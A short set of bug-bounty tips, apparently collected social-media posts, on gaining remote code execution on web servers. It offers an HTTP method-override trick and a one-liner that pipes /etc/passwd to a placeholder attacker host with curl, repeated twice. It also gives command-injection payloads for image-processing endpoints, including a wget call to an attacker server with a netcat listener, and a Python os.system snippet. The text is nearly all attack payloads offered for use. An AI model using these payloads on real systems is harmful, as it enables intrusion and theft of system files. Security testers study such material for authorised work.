If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=inputid or you can even setup a NC & try request=input&&http://wgetyourserver.com :port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.